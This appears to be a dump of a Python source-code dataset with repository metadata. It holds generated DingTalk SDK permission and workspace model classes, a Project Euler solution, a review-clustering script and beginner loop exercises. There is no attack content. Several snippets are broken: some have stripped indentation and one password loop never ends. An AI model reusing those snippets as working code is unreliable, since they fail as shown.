    """Request payload for SearchWorkspaces (keyword search over workspaces)."""

    def __init__(
        self,
        keyword: str = None,
        option: SearchWorkspacesRequestOption = None,
        operator_id: str = None,
    ):
        self.keyword = keyword
        self.option = option
        self.operator_id = operator_id

    def validate(self):
        if self.option:
            self.option.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.keyword is not None:
            out['keyword'] = self.keyword
        if self.option is not None:
            out['option'] = self.option.to_map()
        if self.operator_id is not None:
            out['operatorId'] = self.operator_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('keyword') is not None:
            self.keyword = m.get('keyword')
        if m.get('option') is not None:
            self.option = SearchWorkspacesRequestOption().from_map(m['option'])
        if m.get('operatorId') is not None:
            self.operator_id = m.get('operatorId')
        return self
class SearchWorkspacesResponseBodyItems(TeaModel):
    """A single workspace search hit: name, url and workspace id."""

    def __init__(
        self,
        name: str = None,
        url: str = None,
        workspace_id: str = None,
    ):
        self.name = name
        self.url = url
        self.workspace_id = workspace_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.name is not None:
            out['name'] = self.name
        if self.url is not None:
            out['url'] = self.url
        if self.workspace_id is not None:
            out['workspaceId'] = self.workspace_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('url') is not None:
            self.url = m.get('url')
        if m.get('workspaceId') is not None:
            self.workspace_id = m.get('workspaceId')
        return self
class SearchWorkspacesResponseBody(TeaModel):
    """SearchWorkspaces result: a page of hits plus a paging token."""

    def __init__(
        self,
        items: List[SearchWorkspacesResponseBodyItems] = None,
        next_token: str = None,
    ):
        self.items = items
        self.next_token = next_token

    def validate(self):
        for entry in (self.items or []):
            if entry:
                entry.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        # The generator always emits the list key, even when unset.
        out['items'] = [] if self.items is None else [
            entry.to_map() if entry else None for entry in self.items
        ]
        if self.next_token is not None:
            out['nextToken'] = self.next_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        self.items = []
        if m.get('items') is not None:
            self.items = [
                SearchWorkspacesResponseBodyItems().from_map(entry)
                for entry in m.get('items')
            ]
        if m.get('nextToken') is not None:
            self.next_token = m.get('nextToken')
        return self
class SearchWorkspacesResponse(TeaModel):
    """HTTP envelope for the SearchWorkspaces response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: SearchWorkspacesResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = SearchWorkspacesResponseBody().from_map(m['body'])
        return self
class SetPermissionInheritanceHeaders(TeaModel):
    """Custom headers carried on the SetPermissionInheritance call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class SetPermissionInheritanceRequest(TeaModel):
    """Request payload for SetPermissionInheritance."""

    def __init__(
        self,
        inheritance: str = None,
        union_id: str = None,
    ):
        self.inheritance = inheritance
        self.union_id = union_id

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.inheritance is not None:
            out['inheritance'] = self.inheritance
        if self.union_id is not None:
            out['unionId'] = self.union_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('inheritance') is not None:
            self.inheritance = m.get('inheritance')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class SetPermissionInheritanceResponseBody(TeaModel):
    """SetPermissionInheritance result: a success flag."""

    def __init__(
        self,
        success: bool = None,
    ):
        self.success = success

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.success is not None:
            out['success'] = self.success
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('success') is not None:
            self.success = m.get('success')
        return self
class SetPermissionInheritanceResponse(TeaModel):
    """HTTP envelope for the SetPermissionInheritance response."""

    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: SetPermissionInheritanceResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body

    def validate(self):
        # All envelope parts are required once the call has completed.
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.headers is not None:
            out['headers'] = self.headers
        if self.status_code is not None:
            out['statusCode'] = self.status_code
        if self.body is not None:
            out['body'] = self.body.to_map()
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            self.body = SetPermissionInheritanceResponseBody().from_map(m['body'])
        return self
class UpdatePermissionHeaders(TeaModel):
    """Custom headers carried on the UpdatePermission call."""

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.common_headers is not None:
            out['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            out['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class UpdatePermissionRequestMembers(TeaModel):
    """A member targeted by an UpdatePermission request (corp, id, type)."""

    def __init__(
        self,
        corp_id: str = None,
        id: str = None,
        type: str = None,
    ):
        self.corp_id = corp_id
        self.id = id
        self.type = type

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.corp_id is not None:
            out['corpId'] = self.corp_id
        if self.id is not None:
            out['id'] = self.id
        if self.type is not None:
            out['type'] = self.type
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('type') is not None:
            self.type = m.get('type')
        return self
class UpdatePermissionRequestOption(TeaModel):
    """Options for an UpdatePermission request (permission duration)."""

    def __init__(
        self,
        duration: int = None,
    ):
        self.duration = duration

    def validate(self):
        pass

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        if self.duration is not None:
            out['duration'] = self.duration
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        if m.get('duration') is not None:
            self.duration = m.get('duration')
        return self
class UpdatePermissionRequest(TeaModel):
    """Request payload for UpdatePermission: members, options, role and user."""

    def __init__(
        self,
        members: List[UpdatePermissionRequestMembers] = None,
        option: UpdatePermissionRequestOption = None,
        role_id: str = None,
        union_id: str = None,
    ):
        self.members = members
        self.option = option
        self.role_id = role_id
        self.union_id = union_id

    def validate(self):
        for entry in (self.members or []):
            if entry:
                entry.validate()
        if self.option:
            self.option.validate()

    def to_map(self):
        serialized = super().to_map()
        if serialized is not None:
            return serialized
        out = dict()
        # The generator always emits the list key, even when unset.
        out['members'] = [] if self.members is None else [
            entry.to_map() if entry else None for entry in self.members
        ]
        if self.option is not None:
            out['option'] = self.option.to_map()
        if self.role_id is not None:
            out['roleId'] = self.role_id
        if self.union_id is not None:
            out['unionId'] = self.union_id
        return out

    def from_map(self, m: dict = None):
        if m is None:
            m = dict()
        self.members = []
        if m.get('members') is not None:
            self.members = [
                UpdatePermissionRequestMembers().from_map(entry)
                for entry in m.get('members')
            ]
        if m.get('option') is not None:
            self.option = UpdatePermissionRequestOption().from_map(m['option'])
        if m.get('roleId') is not None:
            self.role_id = m.get('roleId')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class UpdatePermissionResponseBody(TeaModel):
def __init__(
self,
success: bool = None,
):
self.success = success
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.success is not None:
result['success'] = self.success
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('success') is not None:
self.success = m.get('success')
return self
class UpdatePermissionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
status_code: int = None,
body: UpdatePermissionResponseBody = None,
):
self.headers = headers
self.status_code = status_code
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.status_code, 'status_code')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.status_code is not None:
result['statusCode'] = self.status_code
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('statusCode') is not None:
self.status_code = m.get('statusCode')
if m.get('body') is not None:
temp_model = UpdatePermissionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
5c330645e90f346492de9fffdb54c9a30ee92529 | e73f0bd1e15de5b8cb70f1d603ceedc18c42b39b | /Project Euler/018 - triangle path sum.py | e1bc49732e1df9a18b08e09522015fe6b956ba5e | [] | no_license | thran/the_code | cbfa3b8be86c3b31f76f6fbd1deb2013d3326a4a | ba73317ddc42e10791a829cc6e1a3460cc601c44 | refs/heads/master | 2023-01-05T14:39:16.708461 | 2022-12-25T08:37:39 | 2022-12-25T08:37:39 | 160,978,160 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | triangle = """75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23"""
triangle = ([map(int, line.split()) for line in triangle.split("\n")])
# print triangle
maxs = [[0, triangle[0][0], 0]]
for line_number in range(1, len(triangle)):
m_line = [0]
for position in range(line_number+1):
m = max(maxs[line_number-1][position], maxs[line_number-1][position+1])
m_line.append(triangle[line_number][position] + m)
maxs.append(m_line+[0])
print max(maxs[-1])
| [
"thran@centrum.cz"
] | thran@centrum.cz |
dad79b226929c9b8fefe77d75b0102dbdc30556c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_197/ch37_2020_03_23_20_05_44_218037.py | 90428a35c7cf9ff017b68e78d1f501efd0391b52 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | senha="desisto"
Palavra=input("Qual é a senha?")
while Palavra!=senha:
print (Palavra)
else:
print ("Você acertou a senha!") | [
"you@example.com"
] | you@example.com |
a92ae45b4a061d52294fad8bc4060e948b413111 | c634846b4ae574ff265e1a2f140448a33655abb9 | /cluster_reviews.py | 938caa6c238548d0b037e722f8c125bec4d7c26d | [
"MIT"
] | permissive | Amoner/steam-reviews | ac498cb10bb9e50218d6a2aba247aab3e8038f38 | 7e13a71ac9c465f0ae0672843598d52910cbc775 | refs/heads/master | 2020-09-04T23:38:41.376742 | 2019-08-23T05:22:22 | 2019-08-23T05:22:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,609 | py | import sys
import numpy as np
import pandas as pd
from sklearn import metrics
from sklearn.cluster import AffinityPropagation
from sklearn.cluster import AgglomerativeClustering
from sklearn.cluster import Birch
from sklearn.cluster import DBSCAN
from sklearn.decomposition import PCA
from sklearn.neighbors import kneighbors_graph
from sklearn.preprocessing import StandardScaler
from textblob import TextBlob
from describe_reviews import analyze_app_id_in_english, get_review_content
def test_imported_module():
app_id = "573170"
review_id = "38674426"
review_content = get_review_content(app_id, review_id)
print('Test of review retrieval:')
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def convert_from_pandas(data_frame):
# Convert from Pandas to NumPy arrays
# Reference: https://stackoverflow.com/a/22653050
return data_frame.reset_index().values
def convert_from_pandas_dataframe_to_numpy_matrix(df, excluded_columns=None):
# Maybe the variable excluded_columns is not needed after all... I just leave it there as a legacy for now.
if excluded_columns is None:
# noinspection PyPep8Naming
D = df
else:
# Reference: https://stackoverflow.com/a/32152755
# noinspection PyPep8Naming
D = df.loc[:, df.columns.difference(excluded_columns)]
# noinspection PyPep8Naming
D_binary = D.loc[:, ['received_for_free', 'steam_purchase', 'voted_up']]
# noinspection PyPep8,PyPep8Naming
D_generic = D.loc[:,
['num_games_owned', 'num_reviews', 'playtime_forever', 'votes_up', 'votes_funny', 'comment_count',
'weighted_vote_score']]
# noinspection PyPep8Naming
D_length_correlated = D.loc[:, ['character_count', 'syllable_count', 'lexicon_count', 'sentence_count']]
# noinspection PyPep8Naming
D_readability_correlated = D.loc[:,
['dale_chall_readability_score', 'flesch_reading_ease', 'difficult_words_count']]
# noinspection PyPep8Naming
D_sentiment = D.loc[:, ['polarity', 'subjectivity']]
# noinspection PyPep8Naming
X_binary = convert_from_pandas(D_binary)
# noinspection PyPep8Naming
X_generic = convert_from_pandas(D_generic)
# noinspection PyPep8Naming
X_length_correlated = convert_from_pandas(D_length_correlated)
# noinspection PyPep8Naming
X_readability_correlated = convert_from_pandas(D_readability_correlated)
# noinspection PyPep8Naming
X_readability_correlated = np.nan_to_num(X_readability_correlated)
# noinspection PyPep8Naming
X_sentiment = convert_from_pandas(D_sentiment)
scaler = StandardScaler()
# noinspection PyPep8Naming
X_generic_new = scaler.fit_transform(X_generic)
pca_length = PCA(n_components=2)
# noinspection PyPep8Naming
X_length_correlated_new = pca_length.fit_transform(X_length_correlated)
pca_readability = PCA(n_components=2)
# noinspection PyPep8Naming
X_readability_correlated_new = pca_readability.fit_transform(X_readability_correlated)
sentiment_scaler = StandardScaler()
# noinspection PyPep8Naming
X_sentiment_new = sentiment_scaler.fit_transform(X_sentiment)
# noinspection PyPep8Naming
X = np.concatenate(
(X_binary, X_generic_new, X_length_correlated_new, X_readability_correlated_new, X_sentiment_new), axis=1)
return X
def get_top_clusters_by_count(af, provided_labels=None, verbose=False):
if provided_labels is None:
provided_labels = []
if (provided_labels is None) or len(provided_labels) == 0:
# cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
else:
labels = provided_labels
summary_labels = pd.Series(labels).apply(str).value_counts()
if verbose:
print("\nCluster stats: ")
print(summary_labels)
list_of_clusters_by_count = summary_labels.index.tolist()
return summary_labels, list_of_clusters_by_count
def show_representative_reviews(app_id, df, af, num_top_clusters=None, verbose=False):
# Show representative reviews, i.e. the reviews used as cluster centers for Affinity Propagation
# df: dataframe
# af: affinity propagation model
cluster_centers_indices = af.cluster_centers_indices_
# labels = af.labels_
# noinspection PyTypeChecker
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(af,
provided_labels=None,
verbose=verbose)
if num_top_clusters is None:
top_clusters = list_of_clusters_by_count
else:
top_clusters = list_of_clusters_by_count[0:num_top_clusters]
for (cluster_count, cluster_iter) in enumerate(top_clusters):
ind = cluster_centers_indices[int(cluster_iter)]
review_id = list(df["recommendationid"])[ind]
review_content = get_review_content(app_id, review_id)
# Reference: https://stackoverflow.com/a/18544440
print("\n ==== Cluster " + chr(cluster_count + 65) + " (#reviews = " + str(
summary_labels[cluster_count]) + ") ====")
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def print_sentiment_analysis(text):
blob = TextBlob(text)
print('=> Sentiment analysis: '
+ 'polarity({0:.2f})'.format(blob.sentiment.polarity) + ' ; '
+ 'subjectivity({0:.2f})'.format(blob.sentiment.subjectivity) + ')')
return
def show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels=None,
max_num_reviews_to_print=None):
# The provided labels can be supplied directly to override the labels found with Affinity Propagation.
# Typically used to show results obtained with other clustering methods.
# You can display a given number of reviews per cluster by playing with the variable max_num_reviews_to_print.
if provided_labels is None:
provided_labels = []
if (provided_labels is None) or len(provided_labels) == 0:
labels = af.labels_
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(af)
else:
labels = provided_labels
(summary_labels, list_of_clusters_by_count) = get_top_clusters_by_count(None, provided_labels)
cluster_index = int(list_of_clusters_by_count[cluster_count])
if af is not None:
cluster_centers_indices = af.cluster_centers_indices_
cluster_representative_ind = cluster_centers_indices[cluster_index]
else:
# noinspection PyUnusedLocal
cluster_centers_indices = None
cluster_representative_ind = None
cluster_content_indices = [i for i, x in enumerate(list(labels)) if x == cluster_index]
for (review_count, ind) in enumerate(cluster_content_indices):
review_id = list(df["recommendationid"])[ind]
review_content = get_review_content(app_id, review_id)
if (cluster_representative_ind is not None) and (ind == cluster_representative_ind):
info_str = " (representative)"
else:
info_str = ""
if (max_num_reviews_to_print is not None) and (review_count >= max_num_reviews_to_print):
break
# Reference: https://stackoverflow.com/a/18544440
print("\n ==== Review " + str(review_count + 1) + info_str + " in cluster " + chr(
cluster_count + 65) + " (#reviews = " + str(summary_labels[cluster_count]) + ") ====")
print_sentiment_analysis(review_content)
try:
print(review_content)
except UnicodeEncodeError:
# Reference: https://stackoverflow.com/a/3224300
print(review_content.encode('ascii', 'ignore'))
return
def show_all_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels=None):
if provided_labels is None:
provided_labels = []
show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, provided_labels)
return
def show_data_frame_for_cluster_centers(df, af, num_top_clusters=None, verbose=True):
cluster_centers_indices = af.cluster_centers_indices_
# labels = af.labels_
(_, list_of_clusters_by_count) = get_top_clusters_by_count(af)
sorted_cluster_centers_indices = cluster_centers_indices[[int(i) for i in list_of_clusters_by_count]]
# Reference: https://stackoverflow.com/a/19155860
df_representative = df.iloc[sorted_cluster_centers_indices, :]
if verbose:
if num_top_clusters is None:
print(df_representative)
else:
print(df_representative.iloc[0:num_top_clusters, :])
return df_representative
# noinspection PyPep8Naming
def try_affinity_propagation(app_id, df, X, num_top_clusters=4, verbose=False):
# #############################################################################
# Compute Affinity Propagation
af = AffinityPropagation().fit(X)
cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
# Show reviews used as cluster centers (for all clusters)
show_representative_reviews(app_id, df, af)
# Print additional info
n_clusters_ = len(cluster_centers_indices)
print('\nEstimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels, metric='sqeuclidean'))
# Show reviews used as cluster centers of the top clusters
show_representative_reviews(app_id, df, af, num_top_clusters, verbose)
# Show all reviews in given cluster (to manually check for cluster homogeneity)
if verbose:
cluster_count = 1 # Warning: this starts at 0
show_all_reviews_from_given_cluster(app_id, df, af, cluster_count)
# Show dataframe limited to cluster centers
_ = show_data_frame_for_cluster_centers(df, af, num_top_clusters)
return labels
# noinspection PyPep8Naming
def try_birch(app_id, df, X, num_clusters_input=3, num_reviews_to_show_per_cluster=3):
# #############################################################################
# Compute Agglomerative Clustering with Birch as a first step
brc = Birch(branching_factor=50, n_clusters=num_clusters_input, threshold=0.5, compute_labels=True)
brc_labels = brc.fit_predict(X)
# Show Birch results
for cluster_count in range(num_clusters_input):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, brc_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, brc_labels, True)
return brc_labels
# noinspection PyPep8Naming
def try_agglomerative_clustering(app_id, df, X, num_clusters_input=3, num_reviews_to_show_per_cluster=3,
linkage='ward', use_connectivity=True):
# #############################################################################
# Compute Agglomerative Clustering without Birch
# NB: linkage can be any of these: 'average', 'complete', 'ward'
if use_connectivity:
knn_graph = kneighbors_graph(X, 30, include_self=False)
connectivity = knn_graph # one of these: None or knn_graph
else:
connectivity = None
model = AgglomerativeClustering(linkage=linkage, connectivity=connectivity, n_clusters=num_clusters_input)
agg_labels = model.fit_predict(X)
# Show Agglomerative Clustering results
for cluster_count in range(num_clusters_input):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, agg_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, agg_labels, True)
return agg_labels
# noinspection PyPep8Naming
def try_dbscan(app_id, df, X, db_eps=0.3, db_min_samples=10, num_reviews_to_show_per_cluster=3):
# #############################################################################
# Compute DBSCAN
# Caveat: It does not seem to be super easy to find adequate parameters.
# For Fidel Dungeon Rescue, the following allows to at least return a few different clusters:
# db_eps = 40
# db_min_samples = 4
db = DBSCAN(eps=db_eps, min_samples=db_min_samples).fit(X)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
dbscan_labels = db.labels_
num_clusters_including_noise_cluster = len(set(dbscan_labels))
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = num_clusters_including_noise_cluster - (1 if -1 in dbscan_labels else 0)
print('Estimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, dbscan_labels))
# Show DBSCAN results
for cluster_count in range(num_clusters_including_noise_cluster):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, None, cluster_count, dbscan_labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, dbscan_labels, True)
return dbscan_labels
def test_every_clustering_method(app_id):
# Clustering
# Reference: http://scikit-learn.org/stable/modules/clustering.html
# NB: We are not interested in outlier detection:
# - if the goal were to remove low-quality reviews, a threshold on review lenght should be sufficient,
# - for some games, the low-quality/"funny meme" reviews are not outliers, they constitute their own sizable cluster
# Features (columns) to exclude
excluded_columns = ["language", "recommendationid"]
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df, excluded_columns)
# Demo of every clustering method
# Affinity Propagation
# NB: The clusters look consistent, I like the results, but:
# - there are too many clusters (11) for our application,
# - and there is no direct control of the number of clusters.
# I don't want to have to look at each cluster to find one-line joke reviews, so I prefer to go with another method.
num_top_clusters = 4
verbose = True
try_affinity_propagation(app_id, df, X, num_top_clusters, verbose)
# Agglomerative Clustering with Birch
num_clusters_input = 3
num_reviews_to_show_per_cluster = 3
try_birch(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster)
# Agglomerative Clustering without Birch
# NB: With some parameters, results are similar to Birch's (as expected from scikit-learn documentation of Birch).
linkage = 'ward'
use_connectivity = True
try_agglomerative_clustering(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster, linkage,
use_connectivity)
# DBSCAN
# NB: Not satisfactory here. Either the parameters, or the data pre-processing, should be changed for DBSCAN.
db_eps = 40
db_min_samples = 4
try_dbscan(app_id, df, X, db_eps, db_min_samples, num_reviews_to_show_per_cluster)
return
def apply_affinity_propagation(app_id, num_reviews_to_show_per_cluster=3):
# Cluster reviews for app_id using Affinity Propagation
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df)
af = AffinityPropagation().fit(X)
cluster_centers_indices = af.cluster_centers_indices_
labels = af.labels_
# Show reviews used as cluster centers (for all clusters)
show_representative_reviews(app_id, df, af)
# Print additional info
n_clusters_ = len(cluster_centers_indices)
print('\nEstimated number of clusters: %d' % n_clusters_)
print("Silhouette Coefficient: %0.3f"
% metrics.silhouette_score(X, labels, metric='sqeuclidean'))
# Show Affinity Propagation results
for cluster_count in range(n_clusters_):
show_fixed_number_of_reviews_from_given_cluster(app_id, df, af, cluster_count, labels,
num_reviews_to_show_per_cluster)
# Display number of reviews in each cluster
get_top_clusters_by_count(None, labels, True)
return df, labels
def apply_birch(app_id, num_clusters_input=3, num_reviews_to_show_per_cluster=3):
# Cluster reviews for app_id using selected method (Birch and then Agglomerative Clustering)
# Load Pandas dataframe
df = analyze_app_id_in_english(app_id)
# Convert to NumPy matrix format
# noinspection PyPep8Naming
X = convert_from_pandas_dataframe_to_numpy_matrix(df)
brc_labels = try_birch(app_id, df, X, num_clusters_input, num_reviews_to_show_per_cluster)
return df, brc_labels
def main(argv):
app_id_list = ["723090", "639780", "573170"]
if len(argv) == 0:
app_id = app_id_list[-1]
print("No input detected. AppID automatically set to " + app_id)
else:
app_id = argv[0]
print("Input appID detected as " + app_id)
num_reviews_to_show_per_cluster = 3 # Set to None to show all the reviews
apply_birch_method = True
if apply_birch_method:
# Apply Birch and then Agglomerative Clustering
num_clusters_input = 3
(_, _) = apply_birch(app_id, num_clusters_input, num_reviews_to_show_per_cluster)
else:
# Apply Affinity Propagation
(_, _) = apply_affinity_propagation(app_id, num_reviews_to_show_per_cluster)
# Demo of every clustering method
perform_full_test_suite = False
if perform_full_test_suite:
test_every_clustering_method(app_id)
return True
if __name__ == "__main__":
main(sys.argv[1:])
| [
"woctezuma@users.noreply.github.com"
] | woctezuma@users.noreply.github.com |
178b791256772b51daf76b2092c025e4e218ef8b | 09aff11fe5ccac7548d49db3a92803675117eaf3 | /BackEnd/Semana3/Dia4/02-condicionales.py | 92c0a9f066e137b627daaad228c770f8130984cb | [] | no_license | jorgegarba/CodiGo8 | 4defe235a790ebc248f9278f18ca050fde6c195f | f22b2b405ad999e5b960ce5f52936cd4e472af35 | refs/heads/master | 2023-01-09T02:14:27.134870 | 2020-03-18T03:15:52 | 2020-03-18T03:15:52 | 211,871,983 | 4 | 1 | null | 2023-01-07T22:11:22 | 2019-09-30T13:54:52 | JavaScript | UTF-8 | Python | false | false | 1,638 | py | # condiciona if else elif
a = 3
b = 4
# print(a > b)
# if (a > b):
# print("a es mayor que b")
# else:
# print("b es mayor que a")
# elif -> verifica esta otra condicion a ver si
# es correcta, tiene que ir antes de el else
num = 8
# if(num>0):
# print("Es un numero positivo")
# elif (num==0):
# print("Es cero")
# else:
# print("Es negativo")
# for -> es usado para iterar sobre una secuencia
# de elementos
cadena = "Buenos dias"
# for letra in cadena:
# print(letra,end="\n")
# for (let i=0 ; i<10; i++)
# for i in range(0,10,3):
# print(i)
# break -> para parar el bucle
# for numero in range(0,10):
# if(numero==5):
# break
# print(numero)
# continue -> para parar SOLO la iteraccion actual
# for numero in range(10):
# if(numero==6):
# continue
# print(numero)
# for doble
# for numero1 in range(4):
# for numero2 in range(3):
# print(numero1,numero2)
#
# while -> un bucle infinito de acciones mientras sea cierta la condicion
valor = 1
fin = 10
# while(valor<fin):
# print(valor)
# valor += 1 # valor ++
# pass -> no hace nada, solo indica que pase a la siguiente iteracion
# Ejercicio: que de una lista de numeros
numeros = [1,2,3,4,5,6,7,8,9]
#guarde todos los pares en la lista numeros_pares y los impares en la lista
# numeros_impares y que muestre las listas y la lista de numeros debe quedar vacia
numeros_pares=[]
numeros_impares=[]
for numero in numeros:
if(numero%2==0):
numeros_pares.append(numero)
else:
numeros_impares.append(numero)
print(numeros_pares)
print(numeros_impares)
numeros.clear()
print(numeros)
| [
"ederiveroman@gmail.com"
] | ederiveroman@gmail.com |
